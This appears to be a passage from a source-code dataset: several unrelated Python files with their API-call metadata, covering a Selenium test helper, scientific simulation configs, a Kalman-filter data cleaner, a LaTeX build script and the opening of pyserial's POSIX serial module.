Column            Type    Length (min-max)
repo_name         string  7-94
repo_path         string  4-237
repo_head_hexsha  string  40-40
content           string  10-680k
apis              string  2-840k
ankur-gupta91/block_storage
openstack_dashboard/test/integration_tests/regions/messages.py
938548a3d4507dc56c1c26b442767eb41aa2e610
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common import by

from openstack_dashboard.test.integration_tests.regions import baseregion

ERROR = 'alert-danger'
INFO = 'alert-info'
SUCCESS = 'alert-success'


class MessageRegion(baseregion.BaseRegion):
    _close_locator = (by.By.CSS_SELECTOR, 'a.close')

    def _msg_locator(self, level):
        return (by.By.CSS_SELECTOR, 'div.alert.%s' % level)

    def __init__(self, driver, conf, level=SUCCESS):
        self._default_src_locator = self._msg_locator(level)
        # NOTE(tsufiev): we cannot use self._turn_off_implicit_wait() at this
        # point, because the instance is not initialized by ancestor's __init__
        driver.implicitly_wait(0)
        try:
            super(MessageRegion, self).__init__(driver, conf)
        except NoSuchElementException:
            self.src_elem = None
        finally:
            self._turn_on_implicit_wait()

    def exists(self):
        return self._is_element_displayed(self.src_elem)

    def close(self):
        self._get_element(*self._close_locator).click()
[]
bgarbin/GUIDE
model_input.py
06bca4e696b97ca14c11d74844d3b3ab7287f8f1
# -*- coding: utf-8 -*- import numpy as np #import cmath as cm # Main parameters for window # 'record_every': number of time_steps one between two consecutive record events window_params = {'kernel': 'RK4','nstep_update_plot': 100, 'step_size': 0.01, 'array_size': 10000, 'streaming': True, 'record_state':False, 'nstep_record':1, 'window_size':(1200,1000), 'invert_order_obs_var': True,'theme':'dark'} # Definition of the plot configuration def load_docks(): ''' Returns a dict to be used for plots declaration. Here, we use pyqtgraph docks. Each plot has a dictionnary as "value" with keys: "type" (accepted values: 'plot' and 'image'), "zoomOf" (key name of another dock), "position" (accepted values: 'bottom', 'top', 'left', 'right', 'above', or 'below'), "relativeTo" (optional, key name of another dock; position relative to another dock), size [(xlength,ylength); note that lengths arguments are only a suggestion; docks will still have to fill the entire dock area and obey the limits of their internal widgets], "labels" (dict of position:str), "title" (str). ''' docks = { 'plot1' : {'type': 'plot1D' , 'position': 'left' , 'size': (500,500), 'labels':{'bottom':'Time (arb. units)','left':'Intensity (arb. units)'}}, 'phase_space' : {'type': 'plot2D', 'position': 'right', 'size': (300,300)}, 'plot2' : {'type': 'plot1D' , 'zoomOf': 'plot1' , 'position': 'bottom', 'relativeTo': 'phase_space', 'size': (300,100)}, 'plot3' : {'type': 'plot1D', 'position': 'top','relativeTo':'phase_space', 'size': (300,300)}, 'custom_name' : {'type': 'image', 'position': 'above','relativeTo':'plot3', 'size': (300,300)}, } return docks def load_variables(): ''' Returns a dict of the variables. Each variable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is diff_eq_{variable_name}), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (False), "lineedit", "checkbox". ''' variables = { 'A' : {'type': np.complex128, 'init_cond': 0., 'plot': False, 'dock':['plot1','plot2'], 'help':'field in the first cavity'}, 'B' : {'type': np.complex128, 'init_cond': 0.001, 'plot': False, 'equation': diff_eq_B} } return variables def load_observables(): ''' Returns a dict of the observables. Similar to variables, observables are added internally to the dictionnary of variables. Each observable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is eq_{variable_name}), "calculation_size" (bool, whether you want according variable to be only the size of what calculation returns; WARNING: those items won't be stored), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (True), "lineedit", "checkbox". 
''' observables = { 'mod_A' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':['plot1','plot2'], 'help':'modulus square of A'}, 'mod_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot1','plot2','plot3']}, 'mod_A_2' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':[{'phase_space':['mod_A_2','mod_B_2']}],'calculation_size':True, 'help':'abs(A)**2 shorter to be plotted in phase space'}, 'mod_B_2' : {'type': np.float64, 'init_cond': 0. ,'dock':[{'phase_space':['mod_B_2','mod_A_2']}],'calculation_size':True}, 'mod_A_2D' : {'type': np.float64, 'init_cond': 0. ,'dock':['custom_name'],'calculation_size':True,'help':'variable to be used plotted in image'}, #'ph_A' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']}, #'ph_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']} } return observables def load_params(): ''' Returns a dict of the parameters. Similarly to variables/observables, each parameter has a dictionnary as "value" with keys: "init_cond" (float), "min" (float), "max" (float), step (float or int; WARNING if int this parameter will be an integer), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "spinbox", "slider", "slider_conversion_factor". ''' params = {} params['delta'] = {'init_cond': -8., 'min': -10., 'max': 10., 'step': 0.01, 'help':'detuning parameter'} params['f'] = {'init_cond': 4.8, 'min': 0. , 'max': 20., 'step': 0.01} params['kappa'] = {'init_cond': 2.8, 'min': 0. , 'max': 10., 'step': 0.01} params['gamma'] = {'init_cond': 0. , 'min': -1. , 'max': 1., 'step': 0.01} params['tau'] = {'init_cond': 1. , 'min': 0. , 'max': 10., 'step': 0.01} params['npts_PS'] = {'init_cond': 1000 , 'min': 1 , 'max': 2000, 'step': 1} params['folding'] = {'init_cond': 100 , 'min': 1 , 'max': 1000, 'step': 1} params['min_scan'] = {'init_cond': 0, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'} params['max_scan'] = {'init_cond': 10, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'} params['step_scan'] = {'init_cond': 0.05, 'min': 0.001, 'max': 10., 'step': 0.001, 'help':'detuning parameter'} params['nstep_scan'] = {'init_cond': 50, 'min': 0, 'max': 500, 'step': 1, 'help':'detuning parameter'} return params # BEGIN Declaration of the equations. Automatically recognized pattern are "diff_eq_{variable}" (variables) and "eq_{observable}" (observables); with a name after the pattern that must match the variable/observable's one. Alternatively, you may use custom equation names. You should declare it in the variable/observable dictionnary with keyword "equation". 
def diff_eq_A(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['A'])**2)*variables['A'] - variables['A'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['B'] + params['f'] def diff_eq_B(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['B'])**2)*variables['B'] - variables['B'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['A'] + params['f'] def eq_mod_A(ui,variables,params): return abs(variables['A'])**2 def eq_mod_B(ui,variables,params): return abs(variables['B'])**2 def eq_mod_A_2(ui,variables,params): return variables['mod_A'][-params['npts_PS']:] def eq_mod_B_2(ui,variables,params): return variables['mod_B'][-params['npts_PS']:] def eq_mod_A_2D(ui,variables,params): folding = params['folding'] nb_rt = int(len(variables['mod_A'])/params['folding']) return np.reshape(variables['mod_A'][-(folding*nb_rt):],(nb_rt,folding)) #def eq_ph_A(variables,params): #return [cm.phase(temp) for temp in variables['A']] #np.array(np.arctan2(np.imag(variables['A']), np.real(variables['A']))) #def eq_ph_B(variables,params): #return [cm.phase(temp) for temp in variables['B']] def keyboard_keys(): """ Returns a dictionnary of user defined keys of form key:callable. System reserved keys: [" ", "q", "h", "s", "r", "i", "c"]. This must return an empty dict if no extra keys. """ keys = { 't': ramp_f, } return keys #return {} def ramp_f(ui,variables,params): print('begin scanning') for f in np.concatenate((np.arange(params['min_scan'],params['max_scan']+params['step_scan'],params['step_scan']),np.arange(params['max_scan'],params['min_scan']-params['step_scan'],-params['step_scan']))): f = round(f,2) ui.set_param('f',f) ui.run_simulator(params['nstep_scan']) print('end scanning') def kernel_my_own(variables,params): ''' Takes as arguments dicts of variables and params as {'key':value}. Returns a dict of the results with the same form. For now the function name must start with "kernel_" ''' pass
[((92, 11, 92, 76), 'numpy.reshape', 'np.reshape', ({(92, 22, 92, 59): "variables['mod_A'][-(folding * nb_rt):]", (92, 60, 92, 75): '(nb_rt, folding)'}, {}), "(variables['mod_A'][-(folding * nb_rt):], (nb_rt, folding))", True, 'import numpy as np\n'), ((112, 29, 112, 117), 'numpy.arange', 'np.arange', ({(112, 39, 112, 57): "params['min_scan']", (112, 58, 112, 96): "(params['max_scan'] + params['step_scan'])", (112, 97, 112, 116): "params['step_scan']"}, {}), "(params['min_scan'], params['max_scan'] + params['step_scan'],\n params['step_scan'])", True, 'import numpy as np\n'), ((112, 118, 112, 207), 'numpy.arange', 'np.arange', ({(112, 128, 112, 146): "params['max_scan']", (112, 147, 112, 185): "(params['min_scan'] - params['step_scan'])", (112, 186, 112, 206): "(-params['step_scan'])"}, {}), "(params['max_scan'], params['min_scan'] - params['step_scan'], -\n params['step_scan'])", True, 'import numpy as np\n')]
Harshavardhan-BV/Cancer-compe-strat
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
e4decacd5779e85a68c81d0ce3bedf42dea2964f
from multiprocessing import Pool
import EnvEq as ee
import numpy as np
import itertools as it
import os

#parsing input into numpy arrays
from input import *

y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])
p=np.array([p_o2,p_test])
mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])
lam=np.array([lam_o2,lam_test])
t_D=np.array([t_DTpos,t_DTpro,t_DTneg])
r=np.array([r_Tpos,r_Tpro,r_Tneg])
delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])
rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])
lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)

#make directories for saving raw_outputs
try:
    os.makedirs("../../raw_output/EnvEq/"+f_name)
except:
    pass

#iterator over these
o2_lim_arr=np.empty([0,2])
for ulim_Tpro in np.arange(0.1,1,0.2):
    for ulim_Tneg in np.arange(0.1,1,0.2):
        o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)

def solve_parm(u_lim_o2):
    #calls the solve_eq function with all default inputs other than o2_lim
    f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1])
    lim[0,1,1]=u_lim_o2[0]
    lim[0,2,1]=u_lim_o2[1]
    ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)

if __name__ == '__main__':
    pool = Pool(4)
    pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims
    pool.close()
    pool.join()
[((9, 3, 9, 52), 'numpy.array', 'np.array', ({(9, 12, 9, 51): '[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'}, {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])', True, 'import numpy as np\n'), ((10, 2, 10, 25), 'numpy.array', 'np.array', ({(10, 11, 10, 24): '[p_o2, p_test]'}, {}), '([p_o2, p_test])', True, 'import numpy as np\n'), ((11, 3, 11, 74), 'numpy.array', 'np.array', ({(11, 12, 11, 73): '[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'}, {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])', True, 'import numpy as np\n'), ((12, 4, 12, 31), 'numpy.array', 'np.array', ({(12, 13, 12, 30): '[lam_o2, lam_test]'}, {}), '([lam_o2, lam_test])', True, 'import numpy as np\n'), ((13, 4, 13, 39), 'numpy.array', 'np.array', ({(13, 13, 13, 38): '[t_DTpos, t_DTpro, t_DTneg]'}, {}), '([t_DTpos, t_DTpro, t_DTneg])', True, 'import numpy as np\n'), ((14, 2, 14, 34), 'numpy.array', 'np.array', ({(14, 11, 14, 33): '[r_Tpos, r_Tpro, r_Tneg]'}, {}), '([r_Tpos, r_Tpro, r_Tneg])', True, 'import numpy as np\n'), ((15, 6, 15, 50), 'numpy.array', 'np.array', ({(15, 15, 15, 49): '[delta_Tpos, delta_Tpro, delta_Tneg]'}, {}), '([delta_Tpos, delta_Tpro, delta_Tneg])', True, 'import numpy as np\n'), ((16, 4, 16, 42), 'numpy.array', 'np.array', ({(16, 13, 16, 41): '[rho_Tpos, rho_Tpro, rho_Tneg]'}, {}), '([rho_Tpos, rho_Tpro, rho_Tneg])', True, 'import numpy as np\n'), ((17, 4, 17, 190), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((26, 11, 26, 26), 'numpy.empty', 'np.empty', ({(26, 20, 26, 25): '[0, 2]'}, {}), '([0, 2])', True, 'import numpy as np\n'), ((27, 17, 27, 37), 'numpy.arange', 'np.arange', ({(27, 27, 27, 30): '(0.1)', (27, 31, 27, 32): '(1)', (27, 33, 27, 36): '(0.2)'}, {}), '(0.1, 1, 0.2)', True, 'import numpy as np\n'), ((21, 4, 21, 49), 'os.makedirs', 'os.makedirs', ({(21, 16, 21, 48): "('../../raw_output/EnvEq/' + f_name)"}, {}), "('../../raw_output/EnvEq/' + f_name)", False, 'import os\n'), ((28, 21, 28, 41), 'numpy.arange', 'np.arange', ({(28, 31, 28, 34): '(0.1)', (28, 35, 28, 36): '(1)', (28, 37, 28, 40): '(0.2)'}, {}), '(0.1, 1, 0.2)', True, 'import numpy as np\n'), ((36, 4, 36, 64), 'EnvEq.solve_eq', 'ee.solve_eq', ({(36, 16, 36, 21): 't_max', (36, 22, 36, 24): 'dt', (36, 25, 36, 27): 'y0', (36, 28, 36, 29): 'p', (36, 30, 36, 32): 'mu', (36, 33, 36, 36): 'lam', (36, 37, 36, 38): 'r', (36, 39, 36, 40): 'K', (36, 41, 36, 46): 'delta', (36, 47, 36, 50): 'rho', (36, 51, 36, 54): 'lim', (36, 55, 36, 63): 'f_name_i'}, {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)', True, 'import EnvEq as ee\n'), ((39, 11, 39, 18), 'multiprocessing.Pool', 'Pool', ({(39, 16, 39, 17): '4'}, {}), '(4)', False, 'from multiprocessing import Pool\n'), ((29, 19, 29, 71), 'numpy.append', 'np.append', (), '', True, 'import numpy as np\n')]
1985312383/contest
task1_makeTrainingDataset.py
c4734647ad436cf5884075f906a3e9f10fc4dcfa
import csv import re import numpy as np thre = 1.5 # 要调整的参数,这个是阈值 iteration_num = 2 # 要调整的参数,这个是迭代次数 def KalmanFilter(z, n_iter=20): # 卡尔曼滤波 # 这里是假设A=1,H=1的情况 # intial parameters sz = (n_iter,) # size of array # Q = 1e-5 # process variance Q = 1e-6 # process variance # allocate space for arrays xhat = np.zeros(sz) # a posteri estimate of x P = np.zeros(sz) # a posteri error estimate xhatminus = np.zeros(sz) # a priori estimate of x Pminus = np.zeros(sz) # a priori error estimate K = np.zeros(sz) # gain or blending factor R = 0.015 ** 2 # estimate of measurement variance, change to see effect # intial guesses xhat[0] = 0.0 P[0] = 1.0 A = 1 H = 1 for k in range(1, n_iter): # time update xhatminus[k] = A * xhat[k - 1] # X(k|k-1) = AX(k-1|k-1) + BU(k) + W(k),A=1,BU(k) = 0 Pminus[k] = A * P[k - 1] + Q # P(k|k-1) = AP(k-1|k-1)A' + Q(k) ,A=1 # measurement update K[k] = Pminus[k] / (Pminus[k] + R) # Kg(k)=P(k|k-1)H'/[HP(k|k-1)H' + R],H=1 xhat[k] = xhatminus[k] + K[k] * (z[k] - H * xhatminus[k]) # X(k|k) = X(k|k-1) + Kg(k)[Z(k) - HX(k|k-1)], H=1 P[k] = (1 - K[k] * H) * Pminus[k] # P(k|k) = (1 - Kg(k)H)P(k|k-1), H=1 return xhat def data_process(file_path: str): with open(file_path, "r") as f: # 打开文件 f.readline() # 去掉第一行 data = f.readlines() # 读取文件 data_num = len(data) / 4 if int(data_num) - data_num < -0.1: raise ValueError("数据数量不对!") initial_time = re.search(":.*:([0-9]*)", data[0], flags=0) # 获取初始数据序列 initial_time = int(initial_time.group(1)) Measures = [] for i in range(int(data_num)): measure = [] for j in range(4): device = [] anchor = re.search(":[0-9]*?:RR:0:([0-9]):[0-9]*?:([0-9]*?):[0-9]*?:([0-9]*)", data[4 * i + j], flags=0) device.extend([int(anchor.group(3)) - initial_time, anchor.group(1), anchor.group(2)]) # 获取数据序号、设备号、测量值 device = list(map(int, device)) measure.append(device) # 一个measure就是四个设备拿到的四份数据 Measures.append(measure) Measures = np.array(Measures) # Measures是三维数组是获取的所有测量数据 normalized_device_data = [] normalized_device_data_x = [] device_data = [] device_data_x = [] for i in range(4): device_data.append(Measures[:, i, 2]) device_data_x.append(np.arange(len(Measures[:, i, 2]))) normalized_device_data.append(device_data[i] / np.max(Measures[:, i, 2])) # 最大值归一化 normalized_device_data_x = device_data_x normalized_device_data = np.array(normalized_device_data) normalized_device_data_x = np.array(normalized_device_data_x) device_data = np.array(device_data) device_data_x = np.array(device_data_x) processed_device_data = np.array(device_data).copy() device_mean = np.mean(device_data, axis=1) device_std = np.std(device_data, axis=1) low_thre = device_mean - device_std * thre # 去除离群点 high_thre = device_mean + device_std * thre # 去除离群点 for _ in range(iteration_num): for i in range(4): for j in range(len(device_data[i, :])): if device_data[i, j] < low_thre[i] or device_data[i, j] > high_thre[i]: processed_device_data[i, j] = device_mean[i] xhat = [] for i in range(4): # raw_data = device_data[i] raw_data = processed_device_data[i] xhat.append(KalmanFilter(raw_data, n_iter=len(raw_data))) xhat = np.array(xhat) xhat = np.around(xhat, 1) # 将滤波后的四组坐标值,保留一位小数 return device_data, xhat # device_data为原始数据,xhat是离群点去除且卡尔曼滤波后的数据 def save_data(file_path: str, Measures): with open(file_path, "w+", newline="") as datacsv: # dialect为打开csv文件的方式,默认是excel,delimiter="\t"参数指写入的时候的分隔符 csvwriter = csv.writer(datacsv, dialect=("excel")) # csv文件插入一行数据,把下面列表中的每一项放入一个单元格(可以用循环插入多行) csvwriter.writerow(["Number", "A0", "A1", "A2", "A3"]) csvwriter.writerows(np.column_stack((np.arange(Measures.shape[1]), Measures.T)), 
) def collect_dataset(kind): for i in range(1, 325): file_path = f"./data/附件1:UWB数据集/{kind}数据/{i}.{kind}.txt" original_data, final_processed_data = data_process(file_path) save_data(f"cleaned_data/{kind}数据/{i}.{kind}.csv", final_processed_data) def collect_labels(): pass if __name__ == '__main__': collect_dataset("正常") collect_dataset("异常")
[((18, 11, 18, 23), 'numpy.zeros', 'np.zeros', ({(18, 20, 18, 22): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((19, 8, 19, 20), 'numpy.zeros', 'np.zeros', ({(19, 17, 19, 19): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((20, 16, 20, 28), 'numpy.zeros', 'np.zeros', ({(20, 25, 20, 27): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((21, 13, 21, 25), 'numpy.zeros', 'np.zeros', ({(21, 22, 21, 24): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((22, 8, 22, 20), 'numpy.zeros', 'np.zeros', ({(22, 17, 22, 19): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((53, 19, 53, 62), 're.search', 're.search', (), '', False, 'import re\n'), ((66, 15, 66, 33), 'numpy.array', 'np.array', ({(66, 24, 66, 32): 'Measures'}, {}), '(Measures)', True, 'import numpy as np\n'), ((77, 29, 77, 61), 'numpy.array', 'np.array', ({(77, 38, 77, 60): 'normalized_device_data'}, {}), '(normalized_device_data)', True, 'import numpy as np\n'), ((78, 31, 78, 65), 'numpy.array', 'np.array', ({(78, 40, 78, 64): 'normalized_device_data_x'}, {}), '(normalized_device_data_x)', True, 'import numpy as np\n'), ((79, 18, 79, 39), 'numpy.array', 'np.array', ({(79, 27, 79, 38): 'device_data'}, {}), '(device_data)', True, 'import numpy as np\n'), ((80, 20, 80, 43), 'numpy.array', 'np.array', ({(80, 29, 80, 42): 'device_data_x'}, {}), '(device_data_x)', True, 'import numpy as np\n'), ((82, 18, 82, 46), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((83, 17, 83, 44), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((98, 11, 98, 25), 'numpy.array', 'np.array', ({(98, 20, 98, 24): 'xhat'}, {}), '(xhat)', True, 'import numpy as np\n'), ((99, 11, 99, 29), 'numpy.around', 'np.around', ({(99, 21, 99, 25): 'xhat', (99, 27, 99, 28): '1'}, {}), '(xhat, 1)', True, 'import numpy as np\n'), ((106, 20, 106, 58), 'csv.writer', 'csv.writer', (), '', False, 'import csv\n'), ((61, 21, 61, 116), 're.search', 're.search', (), '', False, 'import re\n'), ((81, 28, 81, 49), 'numpy.array', 'np.array', ({(81, 37, 81, 48): 'device_data'}, {}), '(device_data)', True, 'import numpy as np\n'), ((75, 55, 75, 80), 'numpy.max', 'np.max', ({(75, 62, 75, 79): 'Measures[:, (i), (2)]'}, {}), '(Measures[:, (i), (2)])', True, 'import numpy as np\n'), ((109, 45, 109, 73), 'numpy.arange', 'np.arange', ({(109, 55, 109, 72): 'Measures.shape[1]'}, {}), '(Measures.shape[1])', True, 'import numpy as np\n')]
marcinguy/checkmate-ce
checkmate/contrib/plugins/all/progpilot/setup.py
fc33c7c27bc640ab4db5dbda274a0edd3b3db218
from .analyzer import ProgpilotAnalyzer
from .issues_data import issues_data

analyzers = {
    'phpanlyzer' : {
        'name' : 'phpanalyzer',
        'title' : 'phpanalyzer',
        'class' : ProgpilotAnalyzer,
        'language' : 'all',
        'issues_data' : issues_data,
    },
}
[]
truckli/technotes
genlist.py
11d3cc0a1bd33141a22eaa2247cac1be1d74718a
#!/usr/bin/env python import shutil, re, os, sys file_model = "Model.template" bookname = "TechNotes" file_bibtex = "thebib.bib" folder_target = "../pdf/" #if name is a chapter, return its sections def get_sections(name): if not os.path.isdir(name): return [] files = os.listdir(name) sections = [] for section in files: if re.match('.*\.tex$', section) and not re.match(".*lmz0610.*", section): sections.append(name + "/" + section) return sections def is_updated(pdffile, texfiles): def depend_modified(fname, ims): depend_mtime = os.path.getmtime(fname) if depend_mtime > ims: print pdffile, ' mtime: ',ims print fname, ' mtime: ', depend_mtime return True return False old_pdffile = folder_target + pdffile if not os.path.isfile(old_pdffile): return False pdf_mtime = os.path.getmtime(old_pdffile) #if depend_modified(sys.argv[0], pdf_mtime): #return False #if depend_modified(file_model, pdf_mtime): #return False for section in texfiles: if depend_modified(section, pdf_mtime): return False return True def remove_tmp(tmpname): if os.path.isfile(tmpname): os.remove(tmpname) def remove_latex_tmps(texname): remove_tmp(texname + ".pdf") remove_tmp(texname + ".tex") remove_tmp(texname + ".blg") remove_tmp(texname + ".bbl") remove_tmp(texname + ".out") remove_tmp(texname + ".toc") remove_tmp(texname + ".aux") remove_tmp(texname + ".idx") remove_tmp(texname + ".log") remove_tmp(texname + ".lof") remove_tmp(texname + ".lot") def read_bbl_file(object_name): file_bbl = object_name + ".bbl" if not os.path.isfile(file_bbl): return "" with open(file_bbl, 'r') as f: return f.read() #if depend_files contains citation def need_bibtex(object_name, depend_files): #if a file contains latex citation command \cite{} def contain_citation(section_name): with open(section_name, "r") as f: content_section = f.read() if content_section.find("\\cite{") == -1: return False return True for section in depend_files: if contain_citation(section): return True return False def gen_pdf(object_name): object_pdf = object_name + ".pdf" if object_name == bookname: depend_files = book_sections targets = [folder_target + object_pdf, folder_target + "AAAAAAAAAAA.pdf"] chapter_start_counter = 0 else: depend_files = chap_sections[object_name] targets = [folder_target + object_pdf] chapter_start_counter = book_chapters.index(object_name) # if is_updated(object_pdf, depend_files): # print(object_pdf + " is updated") # return False obj_need_bibtex = need_bibtex(object_name, depend_files) model = '' with open(file_model) as model_file: model = model_file.read() model = model.replace("OBJECTNAME", object_name) if object_name == 'Report': model = model.replace("CHAPTERSTART", "0") model = model.replace("\\tableofcontents", "%\\tableofcontents") model = model.replace("ctexrep", "ctexart") model = model.replace("\\setcounter{chapter}", "%\\setcounter{chapter}") else: model = model.replace("CHAPTERSTART", str(chapter_start_counter)) insert_word = "TOADD" insert_pos = model.find(insert_word) latex_text = model[:insert_pos] + insert_word for section in depend_files: latex_text = latex_text + "\n\\input{"+ section + "}" #prepend text encoding mode line section_text = "" with open(section, 'r') as f: line = f.readline() if line[:6] != '%!Mode': section_text = '%!Mode:: "TeX:UTF-8"\n' + line + f.read() if section_text != "": with open(section, 'w') as f: f.write(section_text) if obj_need_bibtex: latex_text = latex_text + "\n\n" latex_text = latex_text + "\\bibliographystyle{unsrt}\n" latex_text = latex_text + "\\bibliography{thebib}\n" latex_text = 
latex_text + model[insert_pos+len(insert_word):] object_tex = object_name + ".tex" with open(object_tex, "w") as f: f.write(latex_text) # os.system("xelatex " + object_name) # if len(sys.argv) < 3 or sys.argv[2] != "fast": # if obj_need_bibtex: # old_bbl = read_bbl_file(object_name) # os.system("bibtex " + object_name) # if old_bbl != read_bbl_file(object_name): # os.system("xelatex " + object_name) # os.system("xelatex " + object_name) # # if os.path.isfile(object_pdf): # for target in targets: # shutil.copy(object_pdf, target) return True #trim trailing slash def trim_chap_name(name): if name[len(name) - 1] == '/': name = name[:len(name)-1] return name def merge_chapter_pdfs(): mergecmd = 'pdftk ' for chap in book_chapters: chappdf = folder_target + chap + '.pdf' if os.path.isfile(chappdf): mergecmd += chappdf + ' ' mergecmd += 'cat output ' + folder_target + 'AAABBBBBBBB.pdf' print mergecmd os.system(mergecmd) ################################################## #now work starts files = os.listdir('.') chap_sections = {} book_sections = [] book_chapters = [] for chap in files: sections = get_sections(chap) if len(sections): chap_sections[chap] = sections book_sections.extend(sections) book_chapters.append(chap) cmd = "one" if cmd == "one": gen_pdf(bookname) elif cmd == "all": modified = False for chap in chap_sections: modified = gen_pdf(chap) or modified if modified: merge_chapter_pdfs() elif cmd == "clean": for chap in chap_sections: remove_latex_tmps(chap) remove_latex_tmps(bookname) else: chap = trim_chap_name(cmd) if chap in book_sections: #chap is actually a section section = chap chap = 'Report' chap_sections[chap] = [section] book_chapters.append(chap) if not chap_sections.has_key(chap): print(chap + " is not a valid chapter name") sys.exit(1) modified = gen_pdf(chap) if modified and chap != 'Report': merge_chapter_pdfs()
[]
mattl1598/testing
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
cd8124773b83a07301c507ffbb9ccaafbfe7a274
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 Chris Liechti <[email protected]> # this is distributed under a free software license, see license.txt # # parts based on code from Grant B. Edwards <[email protected]>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from .serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port ASYNC_SPD_MASK = 0x1030 ASYNC_SPD_CUST = 0x0030 def set_special_baudrate(port, baudrate): import array buf = array.array('i', [0] * 32) # get serial_struct FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf) # set custom divisor buf[6] = buf[7] / baudrate # update flags buf[4] &= ~ASYNC_SPD_MASK buf[4] |= ASYNC_SPD_CUST # set serial_struct try: res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf) except IOError: raise ValueError('Failed to set custom baud rate: %r' % baudrate) baudrate_constants = { 0: 0000000, # hang up 50: 0o000001, 75: 0o000002, 110: 0o000003, 134: 0o000004, 150: 0o000005, 200: 0o000006, 300: 0o000007, 600: 0o000010, 1200: 0o000011, 1800: 0o000012, 2400: 0o000013, 4800: 0o000014, 9600: 0o000015, 19200: 0o000016, 38400: 0o000017, 57600: 0o010001, 115200: 0o010002, 230400: 0o010003, 460800: 0o010004, 500000: 0o010005, 576000: 0o010006, 921600: 0o010007, 1000000: 0o010010, 1152000: 0o010011, 1500000: 0o010012, 2000000: 0o010013, 2500000: 0o010014, 3000000: 0o010015, 3500000: 0o010016, 4000000: 0o010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat == 'openbsd3': # BSD (confirmed) def device(port): return '/dev/ttyp%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd' or \ plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d) def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can 